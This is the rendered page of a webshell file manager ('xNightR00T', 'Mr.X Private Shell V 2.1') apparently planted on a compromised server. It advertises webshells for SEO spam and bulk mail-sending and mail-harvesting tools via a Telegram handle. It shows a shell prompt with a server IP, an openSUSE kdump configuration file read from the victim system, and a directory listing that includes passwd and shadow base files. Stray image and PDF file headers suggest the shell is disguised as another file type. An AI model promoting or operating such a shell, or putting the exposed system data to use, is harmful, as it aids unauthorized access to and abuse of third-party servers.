xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
## Path:        System/Kernel/Kdump
## Description: Crash Dump Configuration

## Type:	string
## Default:	""
## ServiceRestart:	kdump
#
# Kernel Version string for the -kdump kernel. Use an empty string to
# auto-detect a suitable kernel.
#
# See also: kdump(5).
#
KDUMP_KERNELVER=""

## Type:	integer
## Default:	1
## ServiceRestart:	kdump
#
# Number of CPUs to be used in the kdump environment. You may want to
# increase the number if computing power is the bottleneck in your setup.
#
# If the value is zero, use all available CPUs.
#
# See also: kdump(5).
#
KDUMP_CPUS=1

## Type:	string
## Default:	""
## ServiceRestart:	kdump
#
# The kdump commandline is the command line that needs to be passed off to
# the kdump kernel. If a command line is not specified, the default will be
# taken from /proc/cmdline and adjusted.
#
# WARNING: There are a few options that always should be passed to the kdump
# kernel. See kdump(5) for details. Don't use that variable, consider using
# KDUMP_COMMANDLINE_APPEND instead.
#
KDUMP_COMMANDLINE=""

## Type:        string
## Default:     ""
## ServiceRestart:     kdump
#
# Set this variable if you only want to _append_ values to the default
# command line string. The string gets also appended if KDUMP_COMMANDLINE
# is set.
#
# For network based dumps, you may have to add a "net_delay" parameter
# here. Consult the man page for details.
#
# See also: kdump(5).
#
KDUMP_COMMANDLINE_APPEND=""

## Type:	string
## Default:	""
## ServiceRestart:	kdump
#
# Additional arguments passed to kexec. Normally you don't have to modify
# the default here.
#
# See also: kdump(5).
#
KEXEC_OPTIONS=""

## Type:	yesno
## Default:	yes
## ServiceRestart:	kdump
#
# Immediately reboot after saving the core in the kdump kernel?
#
# See also: kdump(5).
#
KDUMP_IMMEDIATE_REBOOT="yes"

## Type:	string
## Default:	""
## ServiceRestart:	kdump
#
# A script or command executed to process and transfer the dump image.
# It can read the dump image either via /proc/vmcore or /dev/oldmem.
#
# WARNING: Setting that option will make most of the other configuration
# options useless. Don't use that option. It's also not supported.
#
# See also: kdump(5).
#
KDUMP_TRANSFER=""

## Type:	string
## Default:	"file:///var/log/dump"
## ServiceRestart:	kdump
#
# Which directory should the dumps be saved in by the default dumper?
# This can be:
#
#   - a local file, for example "file:///var/log/dump" (or, deprecated,
#     just "/var/log/dump")
#   - a FTP server, for example "ftp://user:password@host/var/log/dump"
#   - a SFTP server, for example "sftp://user@host/var/log/dump"
#   - a SSH server, for example "ssh://user@host/var/log/dump"
#   - a NFS share, for example "nfs://server/export/var/log/dump"
#   - a CIFS (SMB) share, for example
#     "cifs://user:password@host/share/var/log/dump"
#
# SFTP and SSH targets use public/private key authentication, see the manual
# page for more details on setting it up.
#
# See also: kdump(5) which contains an exact specification for the URL format.
# Consider using the "yast2 kdump" module if you are unsure.
#
KDUMP_SAVEDIR="file:///var/crash"

## Type:	integer
## Default:	5
## ServiceRestart:	kdump
#
# Specifies how many old dumps are kept.  If the number of dump files
# exceeds this number, older dumps are removed.
#
# You can prevent the automatic removal by setting zero to this.
# Set KDUMP_KEEP_OLD_DUMPS to "-1" is you want to delete all old
# dumps before saving the new dump.
#
# See also: kdump(5).
#
KDUMP_KEEP_OLD_DUMPS=5

## Type:	integer
## Default:	64
## ServiceRestart:	kdump
#
# Specifies the minimal free disk space (in MB unit) on the dump partition.
# If the free disk space is less than the sum of this value and memory size,
# we won't save vmcore file in order to keep the system sane.
#
# Setting zero forces to dump without check.
#
# See also: kdump(5).
#
KDUMP_FREE_DISK_SIZE=64

## Type:        integer
## Default:     3
## ServiceRestart:	kdump
#
# Determines if kdump uses verbose output. This value is a bitmask:
#
# 1: kdump command line is written to system log when executing
#    /etc/init.d/kdump
# 2: progress is written to stdout while dumping
# 4: kdump command line is written so standard output when executing
#    /etc/init.d/kdump
# 8: Debugging while saving dump.
# 16: Debugging when loading (and detecting) the kdump kernel in boot.kdump.
#
# See also: kdump(5).
#
KDUMP_VERBOSE=3

## Type:        integer
## Default:     31
## ServiceRestart:	kdump
#
# Determines the dump level. If KDUMP_DUMPLEVEL non-zero 0, then makedumpfile
# is used to strip pages that may not be necessary for analysing. 0 means
# no stripping, and 31 is the maximum dump level, i.e. 0 produces the
# largest dump files and 31 the smallest.
#
# See kdump(5) or makedumpfile(8) for a full description what that different
# dump levels mean.
#
KDUMP_DUMPLEVEL=31

## Type:        list(,none,ELF,compressed,lzo,snappy)
## Default:     "compressed"
## ServiceRestart:	kdump
#
# This variable specifies the dump format. Using the "none" option will
# skip capturing the dump entirely and only save the kernel log buffer.
#
# See also: kdump(5).
KDUMP_DUMPFORMAT="compressed"

## Type:        boolean
## Default:     true
## ServiceRestart:	kdump
#
# By default, kdumptool(8) copies multiple files with the save_dump action.
# Set this value to "true" to make kdumptool try to save the next file even
# if saving the previous file failed, or set it to "false" to let the program
# immediately abort.
#
# See also: kdump(5).
#
KDUMP_CONTINUE_ON_ERROR="true"

## Type:        string
## Default:     ""
## ServiceRestart:	kdump
#
# This is a space-separated list of programs (full path) that are required by
# KDUMP_TRANSFER, KDUMP_PRESCRIPT or KDUMP_POSTSCRIPT.
#
# Dynamic libraries that are required by that programs don't have to be included
# as they are resolved automatically. However, it's necessary to include other
# runtime requirements because it's not possible to resolve them automatically.
#
# See also: kdump(5).
#
KDUMP_REQUIRED_PROGRAMS=""

## Type:        string
## Default:     ""
## ServiceRestart:	kdump
#
# Program that is executed before taking the dump. You have to include that
# program in KDUMP_REQUIRED_PROGRAMS.
#
# See also: kdump(5).
#
KDUMP_PRESCRIPT=""

## Type:        string
## Default:     ""
## ServiceRestart:	kdump
#
# Program that is executed after taking the dump and before the system is
# rebooted. You have to include that program in KDUMP_POSTSCRIPT.
#
# See also: kdump(5).
#
KDUMP_POSTSCRIPT=""

## Type:        yesno
## Default:     "yes"
## ServiceRestart:	kdump
#
# Not only copy the dump to KDUMP_SAVEDIR but also the installed kernel.
# If the debugging information is installed, also the debug information will
# be copied. But only the kernel is copied, not all modules.
#
# See also: kdump(5).
#
KDUMP_COPY_KERNEL="yes"

## Type:        string(NOSPARSE,SPLIT,SINGLE,XENALLDOMAINS)
## Default:     ""
## ServiceRestart:	kdump
#
# Space-separated list of flags to tweak the run-time behaviour of kdumptool:
#
#   NOSPARSE disable creation of sparse files.
#   SPLIT    split the dump file with "makedumpfile --split"
#   SINGLE   use single CPU to save the dump
#   XENALLDOMAINS do not filter out Xen DomU pages
#
# See also: kdump(5).
#
KDUMPTOOL_FLAGS=""

## Type:        string
## Default:     auto
## ServiceRestart:	kdump
#
# Network configuration. Use "auto" for auto-detection in initrd, or a string
# that contains the network device and the mode (static, dhcp, dhcp6, auto6),
# separated by a colon. Example: "eth0:static" or "eth1:dhcp".
#
# For static configuration, you may have to add the configuration to
# KDUMP_COMMANDLINE_APPEND.
#
# By default, network is set up only if needed. Add ":force" to make sure
# that network is always available (e.g. for use by a custom pre- or
# post-script).
#
# See also: kdump(5)
#
KDUMP_NETCONFIG="auto"

## Type:        integer
## Default:     30
## ServiceRestart:      kdump
#
# Timeout for network changes. Kdumptool gives up waiting for a working
# network setup when it does not change for the given number of seconds.
#
# See also: kdump(5)
#
KDUMP_NET_TIMEOUT=30

## Type:        string
## Default:     ""
## ServiceRestart:	kdump
#
# SMTP server used for sending a notification email after a dump has
# been taken. See also KDUMP_SMTP_USER and KDUMP_SMTP_PASSWORD if you
# want to use SMTP AUTH.
#
# See also: kdump(5)
#
KDUMP_SMTP_SERVER=""

## Type:        string
## Default:     ""
## ServiceRestart:	kdump
#
# Username for SMTP AUTH when KDUMP_SMTP_SERVER is set. This is optional,
# without username/password, plain SMTP will be used.
#
# See also: kdump(5)
#
KDUMP_SMTP_USER=""

## Type:        string
## Default:     ""
## ServiceRestart:	kdump
#
# Password for SMTP AUTH when KDUMP_SMTP_SERVER is set. This is optional,
# without username/password, plain SMTP will be used.
#
# See also: kdump(5)
#
KDUMP_SMTP_PASSWORD=""

## Type:        string
## Default:     ""
## ServiceRestart:	kdump
#
# Mail address to which a notification mail will be sent when a dump has been
# saved. You have to configure at least KDUMP_SMTP_SERVER to use that feature.
#
# See also: kdump(5)
#
KDUMP_NOTIFICATION_TO=""

## Type:        string
## Default:     ""
## ServiceRestart:	kdump
#
# List of space-separated mail addresses to which notification mail will be
# sent via Cc if a dump has been saved. You have to configure at least
# KDUMP_SMTP_SERVER to use that feature.
#
# See also: kdump(5)
#
KDUMP_NOTIFICATION_CC=""

## Type:        string
## Default:     ""
## ServiceRestart:	kdump
#
# Target host public key, encoded with base64. This is used only for the
# SFTP transfer protocol. If empty, kdump will run 'ssh-keygen -F' to get
# the key from known hosts. If set to "*", any host key will be accepted.
#
# See also: kdump(5)
KDUMP_HOST_KEY=""

## Type:        string
## Default:     ""
## ServiceRestart:	kdump
#
# List of SSH identity files for public key authentication. If empty, kdump
# will try all standard OpenSSH identities for the 'root' user.
#
# See also: kdump(5)
KDUMP_SSH_IDENTITY=""

Filemanager

Name Type Size Permission Actions
group.aaa_base File 382 B 0644
passwd.aaa_base File 573 B 0644
samba-client-dhcp.conf File 198 B 0644
shadow.aaa_base File 229 B 0644
sysconfig.SuSEfirewall2 File 34.57 KB 0644
sysconfig.atd File 451 B 0644
sysconfig.autofs File 499 B 0644
sysconfig.autoinstall File 804 B 0644
sysconfig.backup File 1.12 KB 0644
sysconfig.bootloader.default File 498 B 0644
sysconfig.bootloader.i386 File 534 B 0644
sysconfig.btrfsmaintenance File 4.05 KB 0644
sysconfig.config-network File 7.93 KB 0644
sysconfig.config-wicked File 1.53 KB 0644
sysconfig.console File 1.39 KB 0644
sysconfig.cron File 2.04 KB 0644
sysconfig.cron-man File 461 B 0644
sysconfig.dhcp-network File 8.58 KB 0644
sysconfig.dhcp-samba-client File 198 B 0644
sysconfig.dhcp-wicked File 5.67 KB 0644
sysconfig.dmraid File 612 B 0644
sysconfig.galera File 511 B 0644
sysconfig.ipmi File 2.51 KB 0644
sysconfig.irqbalance File 497 B 0644
sysconfig.kdump File 9.87 KB 0644
sysconfig.keyboard File 1.32 KB 0644
sysconfig.language File 3.12 KB 0644
sysconfig.lifecycle-report File 408 B 0644
sysconfig.mail File 788 B 0644
sysconfig.mail-postfix File 704 B 0644
sysconfig.mcelog File 386 B 0644
sysconfig.mdadm File 1.71 KB 0644
sysconfig.mouse-gpm File 1.09 KB 0644
sysconfig.net-snmp File 971 B 0644
sysconfig.news File 193 B 0644
sysconfig.nfs File 8.02 KB 0644
sysconfig.ntp File 1.89 KB 0644
sysconfig.pcscd File 195 B 0644
sysconfig.postfix File 15.09 KB 0644
sysconfig.proxy File 1.19 KB 0644
sysconfig.rpcbind File 173 B 0644
sysconfig.saslauthd File 865 B 0644
sysconfig.security File 569 B 0644
sysconfig.security-checksig File 228 B 0644
sysconfig.security-polkit_default_privs File 1.01 KB 0644
sysconfig.services-rpm File 379 B 0644
sysconfig.smartmontools File 1.35 KB 0644
sysconfig.snapper File 121 B 0644
sysconfig.ssh File 221 B 0644
sysconfig.storage-libstorage File 304 B 0644
sysconfig.storage-yast2-storage File 590 B 0644
sysconfig.syslog-ntp File 430 B 0644
sysconfig.syslog-rsyslog File 502 B 0600
sysconfig.windowmanager File 526 B 0644
sysconfig.xinetd File 158 B 0644
sysconfig.yast2 File 3.31 KB 0644
sysconfig.ypbind File 1.72 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1